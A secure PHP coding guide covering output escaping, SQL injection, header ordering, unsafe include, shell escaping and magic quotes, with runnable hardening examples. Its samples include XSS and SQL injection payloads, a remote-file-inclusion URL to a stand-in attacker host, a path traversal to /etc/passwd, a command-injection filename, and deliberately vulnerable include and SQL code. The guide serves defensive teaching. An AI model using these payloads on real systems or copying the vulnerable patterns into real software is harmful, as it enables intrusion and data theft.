Summary of common mistakes made when writing secure PHP code

  • 2020-03-31 20:50:04
  • OfStack

1. Not escaping output as HTML entities
A basic rule: all untrusted input (especially data submitted by the user through a form) must be escaped before it is output.

echo $_GET['username'];

This example might output:

<script>...</script>

That is an obvious cross-site scripting hole unless you can guarantee that users only ever type benign values, which you cannot.
How to repair:
Convert "<", ">", "&" and the quote characters into their HTML entity representations (&lt;, &gt;, &amp;, &quot; and &#039;) with htmlspecialchars() or htmlentities().
The right way:

echo htmlspecialchars($_GET['username'], ENT_QUOTES);

Pass ENT_QUOTES explicitly: without it htmlspecialchars() leaves single quotes alone, which is enough to break out of a single-quoted attribute. On PHP 5.4 and later also pass the charset ('UTF-8') so the function and the page agree on the encoding. Note that this escaping is correct for HTML text and attribute values only; a value placed inside a <script> block or a URL needs the encoding of that context instead.
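The following is an added example, not code from the original article: one output-escaping helper applied to every untrusted value that reaches the HTML, exercised on a few constructed inputs including a single-quote attribute break-out and an invalid UTF-8 byte. The helper name e() and the sample values are this example's own; it assumes the page is served as UTF-8 and that values are written into element text or quoted attributes only.

```php
<?php
// Added example (not from the original article): a single output-escaping
// helper used for every untrusted value that is echoed into HTML.
// Assumptions: the page is served as UTF-8 and values are written into
// element text or quoted attributes only.

declare(strict_types=1);

function e(string $value): string
{
    // ENT_QUOTES also escapes the single quote, which the default flags omit.
    // ENT_SUBSTITUTE replaces invalid UTF-8 with U+FFFD instead of returning
    // an empty string, so a malformed byte cannot blank out the whole field.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs standing in for $_GET['username'].
$samples = [
    'alice',
    '<script>alert(1)</script>',
    '" onmouseover="alert(1)',   // tries to break out of a double-quoted attribute
    "' onfocus='alert(1)",       // tries to break out of a single-quoted attribute
    "Ren\xE9",                   // invalid UTF-8 (a lone Latin-1 byte)
];

foreach ($samples as $username) {
    // Text context and attribute context both use the same escaped value.
    $html  = '<p>Hello, ' . e($username) . '</p>' . "\n";
    $html .= '<input name="username" value="' . e($username) . '">' . "\n";
    $html .= "<input name='username' value='" . e($username) . "'>" . "\n";
    echo $html;
}
```

Every quote, angle bracket and ampersand in the samples comes out as an entity, so none of the payloads can close the tag or attribute it lands in; the invalid byte is printed as the replacement character rather than silently turning the field into an empty string.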
2. Not escaping SQL input
I discussed this in the article "The simplest way to prevent SQL injection (PHP + MySQL)" and gave a simple method. I have been told "we set magic_quotes to On in php.ini, so there is nothing to worry about", but not all input comes from $_GET, $_POST or $_COOKIE! Magic quotes do nothing for values read from files, from the database itself or from other services.
How to repair:
As in "The simplest way to prevent SQL injection (PHP + MySQL)", I recommend the mysql_real_escape_string() function on every value that is spliced into a query.
Correct approach:

<?php
$sql = "UPDATE users SET
    name='" . mysql_real_escape_string($name) . "'
    WHERE id='" . mysql_real_escape_string($id) . "'";
mysql_query($sql);
?>

Note that mysql_real_escape_string() only protects values that are placed inside quotes; an unquoted number such as WHERE id=$id is still injectable. The whole mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7.0; on current versions use mysqli or PDO with prepared statements, which keep the data out of the SQL text altogether.
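The following is an added example, not code from the original article: the same UPDATE written with string concatenation and with a PDO prepared statement, run against an in-memory SQLite database so it can be executed offline. It assumes the pdo_sqlite extension is loaded; the table, rows, function names and the attacker-controlled id value are constructed for the demo.

```php
<?php
// Added example (not from the original article): the same UPDATE written with
// string concatenation and with a prepared statement, run against an in-memory
// SQLite database so it can be executed offline. Assumes the pdo_sqlite
// extension is loaded; the table and rows are constructed here.

declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO users (id, name) VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");

// Constructed attacker-controlled input: a valid name plus an id that closes
// the quoted value and widens the WHERE clause to every row.
$name = 'mallory';
$id   = "1' OR '1'='1";

// Vulnerable: the id becomes part of the SQL text, so the quote inside it is SQL.
function updateNameUnsafe(PDO $db, string $name, string $id): int
{
    $sql = "UPDATE users SET name='$name' WHERE id='$id'";
    return $db->exec($sql);            // number of affected rows
}

// Hardened: placeholders keep the values out of the SQL text. The driver sends
// them separately, so a quote in the data can never become syntax.
function updateNameSafe(PDO $db, string $name, string $id): int
{
    $stmt = $db->prepare('UPDATE users SET name = :name WHERE id = :id');
    $stmt->execute([':name' => $name, ':id' => $id]);
    return $stmt->rowCount();
}

printf("safe:   %d row(s) renamed\n", updateNameSafe($db, $name, $id));   // 0: no id equals that string
printf("unsafe: %d row(s) renamed\n", updateNameUnsafe($db, $name, $id)); // 3: every user is now mallory

foreach ($db->query('SELECT id, name FROM users ORDER BY id') as $row) {
    printf("  %d %s\n", $row['id'], $row['name']);
}
```

The prepared statement is run first so the table is still intact when the concatenated version runs; with the same inputs the first call touches nothing and the second renames all three users, which is exactly the difference between treating the id as data and treating it as SQL.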

3. Wrong use of the HTTP-header-related functions: header(), session_start(), setcookie()
Have you encountered this warning? "Warning: Cannot modify header information - headers already sent by (output started at ...)"

Each time a page is served, the server's output is divided into two parts: the headers and the body.
The headers carry non-visual data such as cookies (and therefore the session id) and redirects. The headers always arrive first. The body contains the visible HTML, images and other data.
If output_buffering is Off, every HTTP-header-related function must be called before any output, including a stray blank line or byte order mark before <?php in an included file. The problem is that output_buffering may be On in the environment you develop in and Off on the server you deploy to. The result is that redirects stop working and cookies and sessions are not set correctly.

How to repair:
Call the HTTP-header-related functions before producing any output, and develop with output_buffering = Off so that ordering mistakes show up on your machine rather than in production. After a Location header, also stop the script with exit: otherwise the rest of the page, including whatever the redirect was meant to protect, is still rendered and sent.
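The following is an added example, not code from the original article: a redirect helper that uses headers_sent() to fail loudly, naming the file and line where output started, instead of letting the warning disappear and the body go out with a 200 status. The helper name redirect() and the simulated login flag are this example's own; the stray echo deliberately reproduces the failure the section describes.

```php
<?php
// Added example (not from the original article): a redirect helper that fails
// loudly when output has already started instead of silently sending the body.
// Function and message names are this example's own.

declare(strict_types=1);

function redirect(string $url, int $status = 302): void
{
    $file = '';
    $line = 0;
    // headers_sent() reports where output started, which is exactly the detail
    // the "headers already sent" warning hides when display_errors is off.
    if (headers_sent($file, $line)) {
        throw new RuntimeException(
            sprintf('Cannot redirect to %s: output already started at %s:%d', $url, $file, $line)
        );
    }
    header('Location: ' . $url, true, $status);
    // Stop here. Without exit the rest of the script still runs and, for an
    // access check, still renders the protected page after the Location header.
    exit;
}

// Simulated access check; a real application would take this from its session.
$loggedIn = false;

// Correct order: decide and redirect before anything is echoed. The line below
// deliberately breaks that order (it stands in for a blank line before <?php in
// an included config file) to show what the helper reports.
echo "\n";

try {
    if (!$loggedIn) {
        redirect('/login.php');
    }
    echo "secret admin page\n"; // must never be reached by an anonymous user
} catch (RuntimeException $e) {
    // In production log this and send a generic error page; never fall through
    // to the protected content.
    echo 'ERROR: ', $e->getMessage(), "\n";
}
```

Run from the command line the script prints the error with the location of the stray output; remove the echo and it redirects and exits before the protected content, which is the ordering the section asks for.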
4. Using unsafe data in require or include
Again: do not trust data you did not explicitly define yourself. Never include or require a file whose name comes from $_GET, $_POST or $_COOKIE.
For example:

index.php
<?php
// including header, config, database connection, etc
include($_GET['filename']);
// including footer
?>

An attacker can now request: http://www.yourdomain.com/index.php?filename=anyfile.txt
to read your confidential information (a non-PHP file is simply echoed, and "../" walks out of the web root) or to execute any PHP file already on the server, such as an uploaded one.
If allow_url_fopen=On, you are dead (since PHP 5.2 remote inclusion additionally requires allow_url_include=On, which is Off by default):
Try this input:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fwww.youaredoomed.com%2Fphphack.php
Your server now fetches http://www.youaredoomed.com/phphack.php and executes whatever PHP code it returns. The attacker can send spam, change passwords, delete files, anything you can imagine.
How to repair:
You must control exactly which files an include or require directive can load.
Here is a quick but incomplete solution:

<?php
// Include only files that are on the allow list.
$allowedFiles = array('file1.txt', 'file2.txt', 'file3.txt');
if (in_array((string) $_GET['filename'], $allowedFiles, true)) {
    include($_GET['filename']);
} else {
    exit('not allowed');
}
?>

It is incomplete because the request still carries a file name, the list must be maintained by hand, and nothing pins the included file to a known directory.
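The following is an added example, not code from the original article, that goes a step further than the allow list above: the request carries only a short key that is mapped to a file name, and the result is then resolved with realpath() and refused unless it lies inside the pages directory. The temporary directory, the two page fragments, the keys and the sample requests are constructed for the demo; resolvePage() is this example's own name.

```php
<?php
// Added example (not from the original article): two layers of control over
// what include() may load. Layer 1 maps a short, user-visible key to a file
// name so the request never carries a path at all; layer 2 resolves the result
// with realpath() and refuses anything outside the pages directory.
// The directory, file names, keys and sample requests are constructed here.

declare(strict_types=1);

// Build a throwaway pages directory with two legitimate page fragments.
$pagesDir = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($pagesDir, 0700);
file_put_contents($pagesDir . '/home.php',  "<?php echo \"home page\\n\";");
file_put_contents($pagesDir . '/about.php', "<?php echo \"about page\\n\";");

// Layer 1: the only values ever accepted from the request are these keys.
$pages = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

function resolvePage(string $requested, array $pages, string $baseDir): ?string
{
    if (!array_key_exists($requested, $pages)) {
        return null;                        // unknown key: not in the allow list
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $pages[$requested]);
    // Layer 2: even a mis-edited allow-list entry cannot escape $baseDir, and a
    // remote URL or php:// wrapper has no realpath at all and is rejected.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed requests standing in for $_GET['filename'].
$requests = [
    'home',
    'about',
    '../../etc/passwd',
    'http://www.youaredoomed.com/phphack.php',
    'php://input',
    'home.php',                             // a file name, not a key: rejected
];

foreach ($requests as $req) {
    $path = resolvePage($req, $pages, $pagesDir);
    if ($path === null) {
        printf("%-42s -> rejected\n", $req);
        continue;
    }
    printf("%-42s -> ", $req);
    include $path;
}

// Clean up the demo directory.
array_map('unlink', glob($pagesDir . '/*.php'));
rmdir($pagesDir);
```

Only the two keys are served; every path, URL and wrapper is rejected before include() sees it, and because the mapping lives in the code rather than in the request, adding a page means editing the array, not trusting a new file name.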

5. Syntax errors
Syntax errors include all lexical and grammatical mistakes, and they are so common that I have to list them here. The solution is to learn PHP's syntax and to be careful not to miss any parentheses, braces, semicolons or quotes. Also switch to a proper editor; do not use Notepad!
6. Little or no object orientation
Many projects do not use PHP's object-oriented features, and as a result maintaining the code becomes very time consuming. PHP's support for object-oriented programming keeps growing and improving, and there is no reason not to use it.
7. Not using a framework
95% of PHP projects do the same four things: create, edit, list and delete. A framework already implements them, so there is no need to write them (and their bugs) again for every project.
8. Not knowing what PHP already has
PHP has a great many functions in its core, yet many programmers keep reinventing the wheel and wasting time. Search the PHP manual before coding, or Google it, and you may find something new! For example, exec() is a powerful function that runs a shell command and returns the last line of its output as a string. To use it safely, pass each untrusted argument through escapeshellarg(); escapeshellcmd() escapes a whole command line but does not stop an attacker from adding extra arguments.
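The following is an added example, not code from the original article: a shell command built from an untrusted file name, shown both as naive concatenation (displayed, not executed) and with escapeshellarg(). It assumes a POSIX shell and the coreutils wc command; the temporary file and the malicious file name are constructed for the demo.

```php
<?php
// Added example (not from the original article): building a shell command
// from an untrusted file name. escapeshellarg() wraps one argument so that
// shell metacharacters in it stay data. Assumes a POSIX shell and wc.

declare(strict_types=1);

// Constructed untrusted input: a "file name" that tries to run a second command.
$userFile = 'report.txt; echo PWNED';

// Create the legitimate file so the safe command has something to count.
$dir = sys_get_temp_dir() . '/exec_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . '/report.txt', "line one\nline two\nline three\n");
chdir($dir);

// Unsafe: the name is spliced into the command text, so ';' ends wc and
// starts a new command. Shown, not executed.
$unsafe = 'wc -l ' . $userFile;
echo "unsafe command text: $unsafe\n";

// Safe: the entire name becomes one single-quoted argument. wc then fails to
// find a file literally named "report.txt; echo PWNED" instead of running echo.
$safe = 'wc -l ' . escapeshellarg($userFile);
echo "safe command text:   $safe\n";
exec($safe . ' 2>&1', $output, $status);
printf("exit status %d, output: %s\n", $status, implode(' | ', $output));

// With a well-formed name the same construction just works.
exec('wc -l ' . escapeshellarg('report.txt'), $output2, $status2);
printf("exit status %d, output: %s\n", $status2, trim($output2[0] ?? ''));

unlink($dir . '/report.txt');
rmdir($dir);
```

The escaped call exits non-zero with a "no such file" message and the injected echo never runs, while the honest file name gives the expected line count; escape per argument rather than relying on escapeshellcmd() for the whole string, because the latter still lets an attacker append options such as a second file name.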
9. Using old versions of PHP
Many programmers still use PHP 4. Developing on PHP 4 does not use PHP's full potential and carries some security concerns. Move to PHP 5; it does not take much work. Most PHP 4 programs can be migrated to PHP 5 with few or no changes to their code. According to http://www.nexen.net, only 12% of PHP servers ran PHP 5 at the time of writing, so 88% of PHP developers are still on PHP 4.
10. Escaping quotes twice
Ever seen \' or \" appear on a web page? This usually happens because magic_quotes_gpc is Off in the developer's environment and On on the deployed server. With magic_quotes_gpc = On, PHP automatically runs addslashes() on all GET, POST and cookie data, and the script then calls addslashes() a second time.

Original text:
It's a string

After magic quotes:
It\'s a string

After the script runs addslashes() again:
It\\\'s a string

The HTML output (the database parser consumed one level of backslashes when the value was stored; the other level survives):
It\'s a string

There is a second case: the user first submits wrong login details, the server detects the mistake and redisplays the form with the values already filled in, and the user submits it again, so the same input is escaped once per submission.
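The following is an added example, not code from the original article: request data is normalised once at the entry point, stripping the slashes magic quotes added, so that every later escaping step is applied exactly once regardless of the server's magic_quotes_gpc setting. The function names and the simulated $_POST arrays are this example's own; get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in PHP 8.0, hence the function_exists() guard.

```php
<?php
// Added example (not from the original article): normalise request data once
// so later escaping is applied exactly once whatever magic_quotes_gpc is set
// to. get_magic_quotes_gpc() is gone in PHP 8, hence the guard; there magic
// quotes no longer exist and nothing needs stripping. The request arrays
// below are constructed to simulate both server settings.

declare(strict_types=1);

function magicQuotesOn(): bool
{
    return function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc();
}

// Remove the slashes magic quotes added, recursively, so the application
// always sees the raw value the user typed.
function unquoteGpc($value)
{
    if (is_array($value)) {
        return array_map('unquoteGpc', $value);
    }
    return stripslashes((string) $value);
}

function normaliseRequest(array $request, bool $magicQuotes): array
{
    return $magicQuotes ? unquoteGpc($request) : $request;
}

$typed = "It's a string";

// Simulated $_POST as PHP hands it over with magic_quotes_gpc = Off and = On.
$postOff = ['comment' => $typed];
$postOn  = ['comment' => addslashes($typed)];   // It\'s a string

foreach (['Off' => [$postOff, false], 'On' => [$postOn, true]] as $setting => [$post, $mq]) {
    $raw = normaliseRequest($post, $mq)['comment'];
    // Escape once, at the point of use: here the legacy addslashes() the
    // article shows for SQL (prepared statements need none) and
    // htmlspecialchars() for HTML. Both start from the same raw value.
    $forSql  = addslashes($raw);
    $forHtml = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
    printf("magic_quotes_gpc=%-3s raw=%s  sql=%s  html=%s\n", $setting, $raw, $forSql, $forHtml);
}

// In real code: $clean = normaliseRequest($_POST, magicQuotesOn());
```

Both settings print the same raw, SQL and HTML forms, which is the point: the application code no longer depends on php.ini, and the doubled backslashes from the section above cannot appear.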
